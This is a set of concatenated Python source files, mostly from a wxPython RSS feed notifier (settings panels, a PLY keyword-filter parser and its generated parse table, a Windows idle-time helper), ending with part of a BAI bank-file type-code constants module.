sound.Bind(wx.EVT_CHECKBOX, self.on_change)
hover.Bind(wx.EVT_CHECKBOX, self.on_change)
top.Bind(wx.EVT_CHECKBOX, self.on_change)
self.duration = duration
self.auto = auto
self.sound = sound
self.hover = hover
self.top = top
return sizer
def create_content(self, parent):
box = wx.StaticBox(parent, -1, 'Content')
sizer = wx.StaticBoxSizer(box, wx.VERTICAL)
grid = wx.GridBagSizer(8, 8)
text = wx.StaticText(parent, -1, 'Max. Title Length')
grid.Add(text, (0, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
text = wx.StaticText(parent, -1, 'Max. Body Length')
grid.Add(text, (1, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
text = wx.StaticText(parent, -1, 'characters')
grid.Add(text, (0, 2), flag=wx.ALIGN_CENTER_VERTICAL)
text = wx.StaticText(parent, -1, 'characters')
grid.Add(text, (1, 2), flag=wx.ALIGN_CENTER_VERTICAL)
title = wx.SpinCtrl(parent, -1, '1', min=1, max=9999, size=(64, -1))
body = wx.SpinCtrl(parent, -1, '1', min=1, max=9999, size=(64, -1))
grid.Add(title, (0, 1))
grid.Add(body, (1, 1))
sizer.Add(grid, 1, wx.EXPAND|wx.ALL, 8)
title.Bind(wx.EVT_SPINCTRL, self.on_change)
body.Bind(wx.EVT_SPINCTRL, self.on_change)
self.title = title
self.body = body
return sizer
def update_controls(self):
model = self.model
self.width.SetValue(model.POPUP_WIDTH)
self.transparency.SetValue(model.POPUP_TRANSPARENCY)
self.duration.SetValue(model.POPUP_DURATION)
self.auto.SetValue(not model.POPUP_AUTO_PLAY)
self.sound.SetValue(model.PLAY_SOUND)
self.hover.SetValue(model.POPUP_WAIT_ON_HOVER)
self.top.SetValue(model.POPUP_STAY_ON_TOP)
self.title.SetValue(model.POPUP_TITLE_LENGTH)
self.body.SetValue(model.POPUP_BODY_LENGTH)
util.select_choice(self.position, model.POPUP_POSITION)
util.select_choice(self.display, model.POPUP_DISPLAY)
self.border_color.SetBackgroundColour(wx.Color(*settings.POPUP_BORDER_COLOR))
self.border_size.SetValue(model.POPUP_BORDER_SIZE)
def update_model(self):
model = self.model
model.POPUP_WIDTH = self.width.GetValue()
model.POPUP_TRANSPARENCY = self.transparency.GetValue()
model.POPUP_DURATION = self.duration.GetValue()
model.POPUP_TITLE_LENGTH = self.title.GetValue()
model.POPUP_BODY_LENGTH = self.body.GetValue()
model.POPUP_AUTO_PLAY = not self.auto.GetValue()
model.POPUP_WAIT_ON_HOVER = self.hover.GetValue()
model.POPUP_STAY_ON_TOP = self.top.GetValue()
model.PLAY_SOUND = self.sound.GetValue()
model.POPUP_POSITION = self.position.GetClientData(self.position.GetSelection())
model.POPUP_DISPLAY = self.display.GetClientData(self.display.GetSelection())
model.POPUP_BORDER_SIZE = self.border_size.GetValue()
color = self.border_color.GetBackgroundColour()
model.POPUP_BORDER_COLOR = (color.Red(), color.Green(), color.Blue())
def on_border_color(self, event):
data = wx.ColourData()
data.SetColour(self.border_color.GetBackgroundColour())
dialog = wx.ColourDialog(self, data)
if dialog.ShowModal() == wx.ID_OK:
self.border_color.SetBackgroundColour(dialog.GetColourData().GetColour())
self.on_change(event)
def on_change(self, event):
self.dialog.on_change()
event.Skip()
class OptionsPanel(wx.Panel):
def __init__(self, parent, dialog):
super(OptionsPanel, self).__init__(parent, -1)
self.dialog = dialog
self.model = dialog.model
panel = self.create_panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
line = wx.StaticLine(self, -1)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(panel, 1, wx.EXPAND|wx.ALL, 8)
self.update_controls()
self.SetSizerAndFit(sizer)
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
sizer = wx.BoxSizer(wx.VERTICAL)
general = self.create_general(panel)
caching = self.create_caching(panel)
proxy = self.create_proxy(panel)
sizer.Add(general, 0, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(caching, 0, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(proxy, 0, wx.EXPAND)
panel.SetSizerAndFit(sizer)
return panel
def create_general(self, parent):
box = wx.StaticBox(parent, -1, 'General')
sizer = wx.StaticBoxSizer(box, wx.VERTICAL)
grid = wx.GridBagSizer(8, 8)
idle = wx.CheckBox(parent, -1, "Don't check feeds if I've been idle for")
grid.Add(idle, (0, 0), flag=wx.ALIGN_CENTER_VERTICAL)
text = wx.StaticText(parent, -1, 'seconds')
grid.Add(text, (0, 2), flag=wx.ALIGN_CENTER_VERTICAL)
timeout = wx.SpinCtrl(parent, -1, '1', min=1, max=9999, size=(64, -1))
grid.Add(timeout, (0, 1))
auto_update = wx.CheckBox(parent, -1, 'Check for software updates automatically')
grid.Add(auto_update, (1, 0), flag=wx.ALIGN_CENTER_VERTICAL)
check_now = wx.Button(parent, -1, 'Check Now')
grid.Add(check_now, (1, 1), flag=wx.ALIGN_CENTER_VERTICAL)
sizer.Add(grid, 1, wx.EXPAND|wx.ALL, 8)
timeout.Bind(wx.EVT_SPINCTRL, self.on_change)
idle.Bind(wx.EVT_CHECKBOX, self.on_change)
auto_update.Bind(wx.EVT_CHECKBOX, self.on_change)
check_now.Bind(wx.EVT_BUTTON, self.on_check_now)
self.idle = idle
self.timeout = timeout
self.auto_update = auto_update
self.check_now = check_now
return sizer
def create_caching(self, parent):
box = wx.StaticBox(parent, -1, 'Caching')
sizer = wx.StaticBoxSizer(box, wx.VERTICAL)
grid = wx.GridBagSizer(8, 8)
text = wx.StaticText(parent, -1, 'Pop-up History')
grid.Add(text, (0, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
#text = wx.StaticText(parent, -1, 'Item Cache')
#grid.Add(text, (1, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
text = wx.StaticText(parent, -1, 'days')
grid.Add(text, (0, 2), flag=wx.ALIGN_CENTER_VERTICAL)
#text = wx.StaticText(parent, -1, 'items per feed')
#grid.Add(text, (1, 2), flag=wx.ALIGN_CENTER_VERTICAL)
item = wx.SpinCtrl(parent, -1, '1', min=1, max=365, size=(64, -1))
grid.Add(item, (0, 1))
#feed = wx.SpinCtrl(parent, -1, '1', min=1, max=9999, size=(64, -1))
#grid.Add(feed, (1, 1))
clear_item = wx.Button(parent, -1, 'Clear')
grid.Add(clear_item, (0, 3))
#clear_feed = wx.Button(parent, -1, 'Clear')
#grid.Add(clear_feed, (1, 3))
sizer.Add(grid, 1, wx.EXPAND|wx.ALL, 8)
item.Bind(wx.EVT_SPINCTRL, self.on_change)
#feed.Bind(wx.EVT_SPINCTRL, self.on_change)
clear_item.Bind(wx.EVT_BUTTON, self.on_clear_item)
#clear_feed.Bind(wx.EVT_BUTTON, self.on_clear_feed)
self.item = item
#self.feed = feed
self.clear_item = clear_item
#self.clear_feed = clear_feed
return sizer
def create_proxy(self, parent):
box = wx.StaticBox(parent, -1, 'Proxy')
sizer = wx.StaticBoxSizer(box, wx.VERTICAL)
grid = wx.GridBagSizer(8, 8)
use_proxy = wx.CheckBox(parent, -1, 'Use a proxy server')
grid.Add(use_proxy, (0, 0), flag=wx.ALIGN_CENTER_VERTICAL)
proxy_url = wx.TextCtrl(parent, -1, style=wx.TE_PASSWORD)
grid.Add(proxy_url, (1, 0), flag=wx.EXPAND)
text = wx.StaticText(parent, -1, 'Format: http://<username>:<password>@<proxyserver>:<proxyport>\nLeave blank to use Windows proxy settings.')
grid.Add(text, (2, 0), flag=wx.ALIGN_CENTER_VERTICAL)
sizer.Add(grid, 1, wx.EXPAND|wx.ALL, 8)
use_proxy.Bind(wx.EVT_CHECKBOX, self.on_change)
proxy_url.Bind(wx.EVT_TEXT, self.on_change)
self.use_proxy = use_proxy
self.proxy_url = proxy_url
return sizer
def update_controls(self):
model = self.model
self.idle.SetValue(model.DISABLE_WHEN_IDLE)
self.timeout.SetValue(model.USER_IDLE_TIMEOUT)
self.auto_update.SetValue(model.CHECK_FOR_UPDATES)
one_day = 60 * 60 * 24
self.item.SetValue(model.ITEM_CACHE_AGE / one_day)
self.use_proxy.SetValue(model.USE_PROXY)
self.proxy_url.ChangeValue(util.decode_password(model.PROXY_URL) or '')
self.enable_controls()
def update_model(self):
model = self.model
model.DISABLE_WHEN_IDLE = self.idle.GetValue()
model.USER_IDLE_TIMEOUT = self.timeout.GetValue()
model.CHECK_FOR_UPDATES = self.auto_update.GetValue()
one_day = 60 * 60 * 24
model.ITEM_CACHE_AGE = self.item.GetValue() * one_day
model.USE_PROXY = self.use_proxy.GetValue()
model.PROXY_URL = util.encode_password(self.proxy_url.GetValue())
def enable_controls(self):
self.timeout.Enable(self.idle.GetValue())
self.proxy_url.Enable(self.use_proxy.GetValue())
def on_change(self, event):
self.enable_controls()
self.dialog.on_change()
event.Skip()
def on_clear_item(self, event):
self.model.controller.manager.clear_item_history()
self.clear_item.Disable()
def on_clear_feed(self, event):
self.model.controller.manager.clear_feed_cache()
self.clear_feed.Disable()
def on_check_now(self, event):
self.check_now.Disable()
self.model.controller.check_for_updates()
class AboutPanel(wx.Panel):
def __init__(self, parent):
super(AboutPanel, self).__init__(parent, -1)
panel = self.create_panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
line = wx.StaticLine(self, -1)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(panel, 1, wx.EXPAND|wx.ALL, 8)
credits = '''
%s %s :: Copyright (c) 2009-2013, <NAME>
16x16px icons in this application are from the Silk Icon set provided by Mark James under a Creative Commons Attribution 2.5 License. http://www.famfamfam.com/lab/icons/silk/
Third-party components of this software include the following:
* Python 2.6 - http://www.python.org/
* wxPython 2.8.10 - http://www.wxpython.org/
* Universal Feed Parser - http://www.feedparser.org/
* PLY 3.3 - http://www.dabeaz.com/ply/
* py2exe 0.6.9 - http://www.py2exe.org/
* Inno Setup - http://www.jrsoftware.org/isinfo.php
Universal Feed Parser, a component of this software, requires that the following text be included in the distribution of this application:
Copyright (c) 2002-2005, <NAME>
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
PLY 3.3 (Python Lex-Yacc), a component of this software, requires that the following text be included in the distribution of this application:
Copyright (C) 2001-2009,
<NAME> (Dabeaz LLC)
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of the David Beazley or Dabeaz LLC may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
''' % (settings.APP_NAME, settings.APP_VERSION)
credits = '\n'.join(line.strip() for line in credits.strip().split('\n'))
text = wx.TextCtrl(self, -1, credits, style=wx.TE_MULTILINE|wx.TE_READONLY)
text.SetBackgroundColour(self.GetBackgroundColour())
sizer.Add(text, 0, wx.EXPAND|wx.ALL&~wx.TOP, 8)
self.SetSizerAndFit(sizer)
def create_panel(self, parent):
panel = wx.Panel(parent, -1, style=wx.BORDER_SUNKEN)
panel.SetBackgroundColour(wx.WHITE)
sizer = wx.BoxSizer(wx.VERTICAL)
bitmap = wx.StaticBitmap(panel, -1, wx.Bitmap('icons/about.png'))
sizer.AddStretchSpacer(1)
sizer.Add(bitmap, 0, wx.ALIGN_CENTER_HORIZONTAL)
sizer.AddStretchSpacer(1)
panel.SetSizerAndFit(sizer)
return panel
|
yabhinav/FeedNotifier | filters.py | <filename>filters.py
# Keyword Filter Parser
EXCLUDE = 0
INCLUDE = 1
ALL = 0xf
TITLE = 1
LINK = 2
AUTHOR = 4
CONTENT = 8
TYPES = {
None: INCLUDE,
'+': INCLUDE,
'-': EXCLUDE,
}
QUALIFIERS = {
None: ALL,
'title:': TITLE,
'link:': LINK,
'author:': AUTHOR,
'content:': CONTENT,
}
TYPE_STR = {
EXCLUDE: '-',
INCLUDE: '+',
}
QUALIFIER_STR = {
ALL: 'all',
TITLE: 'title',
LINK: 'link',
AUTHOR: 'author',
CONTENT: 'content',
}
class Rule(object):
def __init__(self, type, qualifier, word):
self.type = TYPES.get(type, type)
self.qualifier = QUALIFIERS.get(qualifier, qualifier)
self.word = word
def evaluate(self, item, ignore_case=True, whole_word=True):
strings = []
if self.qualifier & TITLE:
strings.append(item.title)
if self.qualifier & LINK:
strings.append(item.link)
if self.qualifier & AUTHOR:
strings.append(item.author)
if self.qualifier & CONTENT:
strings.append(item.description)
text = '\n'.join(strings)
word = self.word
if ignore_case:
text = text.lower()
word = word.lower()
if whole_word:
text = set(text.split())
if word in text:
return self.type == INCLUDE
else:
return self.type == EXCLUDE
def __str__(self):
type = TYPE_STR[self.type]
qualifier = QUALIFIER_STR[self.qualifier]
return '(%s, %s, "%s")' % (type, qualifier, self.word)
class AndRule(object):
def __init__(self, left, right):
self.left = left
self.right = right
def evaluate(self, item, ignore_case=True, whole_word=True):
a = self.left.evaluate(item, ignore_case, whole_word)
b = self.right.evaluate(item, ignore_case, whole_word)
return a and b
def __str__(self):
return '(%s and %s)' % (self.left, self.right)
class OrRule(object):
def __init__(self, left, right):
self.left = left
self.right = right
def evaluate(self, item, ignore_case=True, whole_word=True):
a = self.left.evaluate(item, ignore_case, whole_word)
b = self.right.evaluate(item, ignore_case, whole_word)
return a or b
def __str__(self):
return '(%s or %s)' % (self.left, self.right)
class NotRule(object):
def __init__(self, rule):
self.rule = rule
def evaluate(self, item, ignore_case=True, whole_word=True):
return not self.rule.evaluate(item, ignore_case, whole_word)
def __str__(self):
return '(not %s)' % (self.rule)
# Lexer Rules
reserved = {
'and': 'AND',
'or': 'OR',
'not': 'NOT',
}
tokens = [
'PLUS',
'MINUS',
'LPAREN',
'RPAREN',
'TITLE',
'LINK',
'AUTHOR',
'CONTENT',
'WORD',
] + reserved.values()
t_PLUS = r'\+'
t_MINUS = r'\-'
t_LPAREN = r'\('
t_RPAREN = r'\)'
def t_TITLE(t):
r'title:'
return t
def t_LINK(t):
r'link:'
return t
def t_AUTHOR(t):
r'author:'
return t
def t_CONTENT(t):
r'content:'
return t
def t_WORD(t):
r'(\'[^\']+\') | (\"[^\"]+\") | ([^ \n\t\r+\-()\'"]+)'
t.type = reserved.get(t.value, 'WORD')
if t.value[0] == '"' and t.value[-1] == '"':
t.value = t.value[1:-1]
if t.value[0] == "'" and t.value[-1] == "'":
t.value = t.value[1:-1]
return t
t_ignore = ' \n\t\r'
def t_error(t):
raise Exception
# Parser Rules
precedence = (
('left', 'OR'),
('left', 'AND'),
('right', 'NOT')
)
def p_filter(t):
'filter : expression'
t[0] = t[1]
def p_expression_rule(t):
'expression : rule'
t[0] = t[1]
def p_expression_and(t):
'expression : expression AND expression'
t[0] = AndRule(t[1], t[3])
def p_expression_or(t):
'expression : expression OR expression'
t[0] = OrRule(t[1], t[3])
def p_expression_not(t):
'expression : NOT expression'
t[0] = NotRule(t[2])
def p_expression_group(t):
'expression : LPAREN expression RPAREN'
t[0] = t[2]
def p_rule(t):
'rule : type qualifier WORD'
t[0] = Rule(t[1], t[2], t[3])
def p_type(t):
'''type : PLUS
| MINUS
| empty'''
t[0] = t[1]
def p_qualifier(t):
'''qualifier : TITLE
| LINK
| AUTHOR
| CONTENT
| empty'''
t[0] = t[1]
def p_empty(t):
'empty :'
pass
def p_error(t):
raise Exception
import ply.lex as lex
import ply.yacc as yacc
lexer = lex.lex()
parser = yacc.yacc()
def parse(text):
return parser.parse(text, lexer=lexer)
if __name__ == '__main__':
while True:
text = raw_input('> ')
print parse(text)
|
yabhinav/FeedNotifier | parsetab.py |
# parsetab.py
# This file is automatically generated. Do not edit.
_tabversion = '3.2'
_lr_method = 'LALR'
_lr_signature = '\x03\xd8\xc9Q1\x0e\x13W\xf5\xf7\xacu\x8b$z\xd4'
_lr_action_items = {'AND':([2,8,16,17,20,21,22,23,],[-2,18,18,-5,-7,-6,-3,18,]),'WORD':([0,1,3,5,6,7,9,10,11,12,13,14,15,18,19,],[-16,-16,-9,-8,-16,-16,-10,20,-13,-11,-14,-12,-15,-16,-16,]),'AUTHOR':([0,1,3,5,6,7,9,18,19,],[-16,11,-9,-8,-16,-16,-10,-16,-16,]),'TITLE':([0,1,3,5,6,7,9,18,19,],[-16,12,-9,-8,-16,-16,-10,-16,-16,]),'OR':([2,8,16,17,20,21,22,23,],[-2,19,19,-5,-7,-6,-3,-4,]),'CONTENT':([0,1,3,5,6,7,9,18,19,],[-16,13,-9,-8,-16,-16,-10,-16,-16,]),'LINK':([0,1,3,5,6,7,9,18,19,],[-16,14,-9,-8,-16,-16,-10,-16,-16,]),'LPAREN':([0,6,7,18,19,],[6,6,6,6,6,]),'NOT':([0,6,7,18,19,],[7,7,7,7,7,]),'PLUS':([0,6,7,18,19,],[5,5,5,5,5,]),'$end':([2,4,8,17,20,21,22,23,],[-2,0,-1,-5,-7,-6,-3,-4,]),'MINUS':([0,6,7,18,19,],[3,3,3,3,3,]),'RPAREN':([2,16,17,20,21,22,23,],[-2,21,-5,-7,-6,-3,-4,]),}
_lr_action = { }
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = { }
_lr_action[_x][_k] = _y
del _lr_action_items
_lr_goto_items = {'qualifier':([1,],[10,]),'type':([0,6,7,18,19,],[1,1,1,1,1,]),'rule':([0,6,7,18,19,],[2,2,2,2,2,]),'filter':([0,],[4,]),'expression':([0,6,7,18,19,],[8,16,17,22,23,]),'empty':([0,1,6,7,18,19,],[9,15,9,9,9,9,]),}
_lr_goto = { }
for _k, _v in _lr_goto_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_goto: _lr_goto[_x] = { }
_lr_goto[_x][_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> filter","S'",1,None,None,None),
('filter -> expression','filter',1,'p_filter','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',161),
('expression -> rule','expression',1,'p_expression_rule','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',165),
('expression -> expression AND expression','expression',3,'p_expression_and','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',169),
('expression -> expression OR expression','expression',3,'p_expression_or','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',173),
('expression -> NOT expression','expression',2,'p_expression_not','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',177),
('expression -> LPAREN expression RPAREN','expression',3,'p_expression_group','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',181),
('rule -> type qualifier WORD','rule',3,'p_rule','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',185),
('type -> PLUS','type',1,'p_type','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',189),
('type -> MINUS','type',1,'p_type','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',190),
('type -> empty','type',1,'p_type','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',191),
('qualifier -> TITLE','qualifier',1,'p_qualifier','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',195),
('qualifier -> LINK','qualifier',1,'p_qualifier','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',196),
('qualifier -> AUTHOR','qualifier',1,'p_qualifier','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',197),
('qualifier -> CONTENT','qualifier',1,'p_qualifier','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',198),
('qualifier -> empty','qualifier',1,'p_qualifier','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',199),
('empty -> <empty>','empty',0,'p_empty','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',203),
]
|
yabhinav/FeedNotifier | idle.py | import sys
if sys.platform == 'win32':
from ctypes import *
class LASTINPUTINFO(Structure):
_fields_ = [
('cbSize', c_uint),
('dwTime', c_int),
]
def get_idle_duration():
lastInputInfo = LASTINPUTINFO()
lastInputInfo.cbSize = sizeof(lastInputInfo)
if windll.user32.GetLastInputInfo(byref(lastInputInfo)):
millis = windll.kernel32.GetTickCount() - lastInputInfo.dwTime
return millis / 1000.0
else:
return 0
else:
def get_idle_duration():
return 0
if __name__ == '__main__':
import time
while True:
duration = get_idle_duration()
print 'User idle for %.2f seconds.' % duration
time.sleep(1)
|
yabhinav/FeedNotifier | dummy.py | <reponame>yabhinav/FeedNotifier
# used for dummy.__file__ to setup path
|
ankurCES/bai-file-processor | bai_file_processor/constants.py | from collections import namedtuple
from enum import Enum
CONTINUATION_CODE = '88'
class RecordCode(Enum):
file_header = '01'
group_header = '02'
account_identifier = '03'
transaction_detail = '16'
account_trailer = '49'
continuation = '88'
group_trailer = '98'
file_trailer = '99'
class GroupStatus(Enum):
update = '1'
deletion = '2'
correction = '3'
test_only = '4'
class AsOfDateModifier(Enum):
interim_previous_day = '1'
final_previous_day = '2'
interim_same_day = '3'
final_same_day = '4'
class FundsType(Enum):
unknown_availability = 'Z'
immediate_availability = '0'
one_day_availability = '1'
two_day_availability = '2'
distributed_availability_simple = 'S'
value_dated = 'V'
distributed_availability = 'D'
class TypeCodeTransaction(Enum):
credit = 'credit'
debit = 'debit'
misc = 'misc'
class TypeCodeLevel(Enum):
status = 'status'
detail = 'detail'
summary = 'summary'
TypeCode = namedtuple('TypeCode', ['code', 'transaction', 'level', 'description'])
TypeCodes = [
TypeCode('010', None, TypeCodeLevel.status, 'Opening Ledger'),
TypeCode('011', None, TypeCodeLevel.status, 'Average Opening Ledger MTD'),
TypeCode('012', None, TypeCodeLevel.status, 'Average Opening Ledger YTD'),
TypeCode('015', None, TypeCodeLevel.status, 'Closing Ledger'),
TypeCode('020', None, TypeCodeLevel.status, 'Average Closing Ledger MTD'),
TypeCode('021', None, TypeCodeLevel.status, 'Average Closing Ledger – Previous Month'),
TypeCode('022', None, TypeCodeLevel.status, 'Aggregate Balance Adjustments'),
TypeCode('024', None, TypeCodeLevel.status, 'Average Closing Ledger YTD – Previous Month'),
TypeCode('025', None, TypeCodeLevel.status, 'Average Closing Ledger YTD'),
TypeCode('030', None, TypeCodeLevel.status, 'Current Ledger'),
TypeCode('037', None, TypeCodeLevel.status, 'ACH Net Position'),
TypeCode('039', None, TypeCodeLevel.status, 'Opening Available + Total Same-Day ACH DTC Deposit'),
TypeCode('040', None, TypeCodeLevel.status, 'Opening Available'),
TypeCode('041', None, TypeCodeLevel.status, 'Average Opening Available MTD'),
TypeCode('042', None, TypeCodeLevel.status, 'Average Opening Available YTD'),
TypeCode('043', None, TypeCodeLevel.status, 'Average Available – Previous Month'),
TypeCode('044', None, TypeCodeLevel.status, 'Disbursing Opening Available Balance'),
TypeCode('045', None, TypeCodeLevel.status, 'Closing Available'),
TypeCode('050', None, TypeCodeLevel.status, 'Average Closing Available MTD'),
TypeCode('051', None, TypeCodeLevel.status, 'Average Closing Available – Last Month'),
TypeCode('054', None, TypeCodeLevel.status, 'Average Closing Available YTD – Last Month'),
TypeCode('055', None, TypeCodeLevel.status, 'Average Closing Available YTD'),
TypeCode('056', None, TypeCodeLevel.status, 'Loan Balance'),
TypeCode('057', None, TypeCodeLevel.status, 'Total Investment Position'),
TypeCode('059', None, TypeCodeLevel.status, 'Current Available (CRS Supressed)'),
TypeCode('060', None, TypeCodeLevel.status, 'Current Available'),
TypeCode('061', None, TypeCodeLevel.status, 'Average Current Available MTD'),
TypeCode('062', None, TypeCodeLevel.status, 'Average Current Available YTD'),
TypeCode('063', None, TypeCodeLevel.status, 'Total Float'),
TypeCode('065', None, TypeCodeLevel.status, 'Target Balance'),
TypeCode('066', None, TypeCodeLevel.status, 'Adjusted Balance'),
TypeCode('067', None, TypeCodeLevel.status, 'Adjusted Balance MTD'),
TypeCode('068', None, TypeCodeLevel.status, 'Adjusted Balance YTD'),
TypeCode('070', None, TypeCodeLevel.status, '0-Day Float'),
TypeCode('072', None, TypeCodeLevel.status, '1-Day Float'),
TypeCode('073', None, TypeCodeLevel.status, 'Float Adjustment'),
TypeCode('074', None, TypeCodeLevel.status, '2 or More Days Float'),
TypeCode('075', None, TypeCodeLevel.status, '3 or More Days Float'),
TypeCode('076', None, TypeCodeLevel.status, 'Adjustment to Balances'),
TypeCode('077', None, TypeCodeLevel.status, 'Average Adjustment to Balances MTD'),
TypeCode('078', None, TypeCodeLevel.status, 'Average Adjustment to Balances YTD'),
TypeCode('079', None, TypeCodeLevel.status, '4-Day Float'),
TypeCode('080', None, TypeCodeLevel.status, '5-Day Float'),
TypeCode('081', None, TypeCodeLevel.status, '6-Day Float'),
TypeCode('082', None, TypeCodeLevel.status, 'Average 1-Day Float MTD'),
TypeCode('083', None, TypeCodeLevel.status, 'Average 1-Day Float YTD'),
TypeCode('084', None, TypeCodeLevel.status, 'Average 2-Day Float MTD'),
TypeCode('085', None, TypeCodeLevel.status, 'Average 2-Day Float YTD'),
TypeCode('086', None, TypeCodeLevel.status, 'Transfer Calculation'),
TypeCode('087', None, TypeCodeLevel.status, 'MTD Ave Collected'),
TypeCode('088', None, TypeCodeLevel.status, 'MTD Ave Neg Collected'),
TypeCode('100', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Credits'),
TypeCode('101', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Credit Amount MTD'),
TypeCode('102', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Number of Credits'),
TypeCode('105', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Credits Not Detailed'),
TypeCode('106', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Deposits Subject to Float'),
TypeCode('107', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Adjustment Credits YTD'),
TypeCode('108', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Credit (Any Type)'),
TypeCode('109', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Current Day Total Lockbox Deposits'),
TypeCode('110', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Lockbox Deposits'),
TypeCode('115', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Lockbox Deposit'),
TypeCode('116', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Item in Lockbox Deposit'),
TypeCode('118', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Lockbox Adjustment Credit'),
TypeCode('120', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'EDI* Transaction Credit'),
TypeCode('121', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'EDI Transaction Credit'),
TypeCode('122', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'EDIBANX Credit Received'),
TypeCode('123', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'EDIBANX Credit Return'),
TypeCode('130', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Concentration Credits'),
TypeCode('131', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total DTC Credits'),
TypeCode('135', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'DTC Concentration Credit'),
